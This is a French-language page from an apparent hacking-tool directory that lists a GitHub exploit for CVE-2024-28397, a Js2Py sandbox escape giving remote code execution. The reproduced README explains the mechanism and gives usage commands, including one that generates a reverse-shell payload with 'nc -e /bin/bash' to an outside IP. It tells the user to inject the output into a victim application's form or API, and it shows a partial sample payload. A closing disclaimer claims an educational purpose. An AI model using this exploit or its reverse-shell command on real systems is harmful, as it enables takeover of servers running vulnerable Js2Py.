Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-28397-Js2Py-RCE-Exploit — Exploit professionnel pour CVE-2024-28397 : évasion du sandbox Js2Py menant à une exécution de code à distance (RCE). Inclut la génération modulaire de payloads. | Kitploit
Outils/GitHubGitHub/xeloxa/cve-2024-28397-js2py-rce-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubxeloxa/cve-2024-28397-js2py-rce-exploit

CVE-2024-28397-Js2Py-RCE-Exploit

Exploit professionnel pour CVE-2024-28397 : évasion du sandbox Js2Py menant à une exécution de code à distance (RCE). Inclut la génération modulaire de payloads.

Voir le dépôtSite web
216il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Technical Briefing Preview

💡 Analyse approfondie : Cliquez ici pour lire le briefing technique complet (PDF).

CVE-2024-28397 : Générateur de payload d'évasion sandbox Js2Py

Python License CVE

Un générateur de payload professionnel pour CVE-2024-28397. Cet outil génère du code JavaScript malveillant conçu pour s'échapper du sandbox js2py (versions <= 0.74) et exécuter des commandes arbitraires sur le système cible.

🚨 Détails de la vulnérabilité

  • Identifiant CVE : CVE-2024-28397
  • Composant affecté : Js2Py <= 0.74
  • Impact : Exécution de code à distance (RCE) / Évasion du sandbox
  • Mécanisme : Exploite Object.getOwnPropertyNames pour accéder à la classe subprocess.Popen de Python depuis l'environnement JavaScript.

🚀 Utilisation

Ce script génère le payload JavaScript exact nécessaire pour exploiter la vulnérabilité. Vous n'avez pas besoin d'installer js2py pour utiliser cet outil.

1. Générer un payload

Exécutez le script avec la commande que vous souhaitez exécuter sur la machine de la victime.

# Générer un payload pour exécuter 'id'
python3 exploit.py -c "id"
# Générer un payload pour un shell inversé
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"

2. Attaquer la cible

Copiez la sortie générée par l'outil et injectez-la dans l'application vulnérable (par exemple, un formulaire web, un point de terminaison API ou un fichier de configuration analysé par js2py).

Exemple d'injection : Si un site web prend une entrée utilisateur et l'exécute avec js2py.eval_js(user_input), coller le code généré exécutera votre commande sur leur serveur.

📝 Exemple

$ python3 exploit.py -c "whoami"

    var output = "Initial";
    try {
        var leaked_wrapper = Object.getOwnPropertyNames({});
        // ... (code malveillant complet) ...
        var res = Popen("whoami", ...).communicate();
        output = res;
    } ...
    output

👨‍💻 Auteur

Ali Sünbül (xeloxa)

  • 📧 E-mail : [email protected]
  • 🌐 Site web : xeloxa.netlify.app
  • 🐙 GitHub : @xeloxa

⚠️ Avertissement

Ce logiciel est fourni uniquement à des fins éducatives et de recherche en sécurité. L'auteur décline toute responsabilité en cas de mauvaise utilisation de ce code. Assurez-vous d'avoir l'autorisation explicite avant de tester ceci sur un système qui ne vous appartient pas.

Télécharger l’outil